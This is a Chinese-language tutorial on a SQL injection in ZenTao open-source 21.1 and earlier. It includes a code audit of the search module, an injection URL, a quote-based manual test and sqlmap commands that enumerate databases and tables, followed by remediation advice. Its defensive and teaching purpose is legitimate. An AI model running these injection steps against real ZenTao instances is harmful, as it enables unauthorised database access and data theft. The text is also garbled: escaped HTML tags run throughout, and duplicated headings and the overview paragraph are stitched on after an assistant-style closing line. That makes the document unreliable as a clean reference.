禅道CMS开源版SQL注入漏洞分析与利用教学<\/h1>

1. 漏洞概述<\/h2>
禅道CMS开源版21.1及以下版本存在SQL注入漏洞，该漏洞位于搜索功能模块，由于对用户输入的`words<\/code>参数未进行充分过滤和转义，导致攻击者可以构造恶意输入执行SQL注入攻击。<\/p>`

2. 受影响版本<\/h2>

禅道CMS开源版21.1及以下所有版本<\/li>
<\/ul>
3. 漏洞验证URL<\/h2>
http:\/\/[目标IP]\/index.php?m=search&f=index&words=[注入点]&type=all&zin=1
<\/code><\/pre>
4. 漏洞定位与分析<\/h2>
4.1 漏洞触发点<\/h3>
漏洞主要存在于以下三个文件中：<\/p>

module\/search\/control.php<\/code><\/li>
model.php<\/code><\/li>
module\/search\/tao.php<\/code><\/li>
<\/ol>
4.2 代码审计分析<\/h3>
4.2.1 控制层 (control.php)<\/h4>
在index<\/code>方法中，words<\/code>参数被直接传递给getList<\/code>方法：<\/p>
public<\/span> function<\/span> index<\/span>()
<\/span><\/span>{
<\/span><\/span>    $words =<\/span> $this-><\/span>get<\/span>-><\/span>words<\/span>;
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    $this-><\/span>app<\/span>-><\/span>loadLang<\/span>('search'<\/span>);
<\/span><\/span>    $this-><\/span>search<\/span>-><\/span>getList<\/span>($words, $pager);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.2.2 模型层 (model.php)<\/h4>
getList<\/code>方法将keywords<\/code>参数传递给getSqlParams<\/code>方法：<\/p>
public<\/span> function<\/span> getList<\/span>($keywords, $pager)
<\/span><\/span>{
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    $sqlParams =<\/span> $this-><\/span>getSqlParams<\/span>($keywords);
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.2.3 SQL参数处理 (tao.php)<\/h4>
getSqlParams<\/code>方法中存在漏洞：<\/p>
protected<\/span> function<\/span> getSqlParams<\/span>($keywords)
<\/span><\/span>{
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    $againstCond =<\/span> ''<\/span>;
<\/span><\/span>    foreach<\/span>($words as<\/span> $word)
<\/span><\/span>    {
<\/span><\/span>        $againstCond .=<\/span> "+"<\/span> .<\/span> $word .<\/span> " "<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    $likeCondition =<\/span> "LIKE '%<\/span>$keywords<\/span>%'"<\/span>;
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞成因<\/strong>：<\/p>

$againstCond<\/code>直接拼接用户输入的$word<\/code>，未进行过滤<\/li>
$likeCondition<\/code>直接将$keywords<\/code>插入SQL语句，未进行转义<\/li>
当输入包含单引号等特殊字符时，会破坏SQL语句结构<\/li>
<\/ol>
5. 漏洞验证与复现<\/h2>
5.1 手动验证<\/h3>

访问漏洞URL，在words<\/code>参数中输入单引号('<\/code>)：
http:\/\/192.168.88.9\/index.php?m=search&f=index&words='&type=all&zin=1
<\/code><\/pre>
<\/li>
观察页面是否返回数据库错误信息<\/li>
<\/ol>
5.2 使用SQLMap自动化测试<\/h3>

抓取正常搜索请求数据包，保存为1.txt<\/code><\/li>
在words<\/code>参数值前后添加*<\/code>标记注入点<\/li>
执行以下命令：<\/li>
<\/ol>
python sqlmap.py -r 1.txt --level=<\/span>5<\/span> --risk=<\/span>3<\/span> --threads=<\/span>10<\/span> --dbms=<\/span>mysql
<\/span><\/span><\/code><\/pre>
验证漏洞存在后，可进一步利用：
python sqlmap.py -r 1.txt --dbs  # 查询数据库<\/span>
<\/span><\/span>python sqlmap.py -r 1.txt --current-db  # 查询当前数据库<\/span>
<\/span><\/span>python sqlmap.py -r 1.txt -D [<\/span>数据库名]<\/span> --tables  # 查询表<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
6. 漏洞修复建议<\/h2>

对所有用户输入进行严格的过滤和转义<\/li>
使用参数化查询或预处理语句<\/li>
升级到最新版本的禅道CMS<\/li>
具体修复代码示例：<\/li>
<\/ol>
\/\/ 使用PDO预处理语句替代直接拼接
<\/span><\/span><\/span><\/span>$stmt =<\/span> $pdo-><\/span>prepare<\/span>("SELECT * FROM table WHERE field LIKE :keywords"<\/span>);
<\/span><\/span>$stmt-><\/span>execute<\/span>([':keywords'<\/span> =><\/span> '%'<\/span> .<\/span> $keywords .<\/span> '%'<\/span>]);
<\/span><\/span>
<\/span><\/span>\/\/ 或者至少进行转义
<\/span><\/span><\/span><\/span>$keywords =<\/span> $this-><\/span>dbh<\/span>-><\/span>quote<\/span>($keywords);
<\/span><\/span>$likeCondition =<\/span> "LIKE "<\/span> .<\/span> $keywords;
<\/span><\/span><\/code><\/pre>7. 补充说明<\/h2>

该漏洞属于盲注类型，可能需要使用时间延迟等技术确认<\/li>
漏洞利用需要用户具有搜索权限<\/li>
实际环境中可能需要根据目标配置调整注入语句<\/li>
<\/ol>
8. 参考链接<\/h2>

禅道官网: https:\/\/www.zentao.net\/<\/li>
漏洞原文: 禅道CMS开源版SQL注入漏洞分析-先知社区<\/a><\/li>
<\/ul>

这篇文档涵盖了漏洞的各个方面，包括漏洞描述、影响版本、漏洞分析、复现步骤和修复建议，关键点均已包含且没有无关描述。如需进一步了解某些细节，可以针对特定部分进行深入探讨。<\/p>

禅道CMS开源版SQL注入漏洞分析与利用教学<\/h1>

1. 漏洞概述<\/h2> 禅道CMS开源版21.1及以下版本存在SQL注入漏洞，该漏洞位于搜索功能模块，由于对用户输入的words<\/code>参数未进行充分过滤和转义，导致攻击者可以构造恶意输入执行SQL注入攻击。<\/p>

4. 漏洞定位与分析<\/h2>

4.2 代码审计分析<\/h3>

5. 漏洞验证与复现<\/h2>

1. 漏洞概述<\/h2>
禅道CMS开源版21.1及以下版本存在SQL注入漏洞，该漏洞位于搜索功能模块，由于对用户输入的`words<\/code>参数未进行充分过滤和转义，导致攻击者可以构造恶意输入执行SQL注入攻击。<\/p>`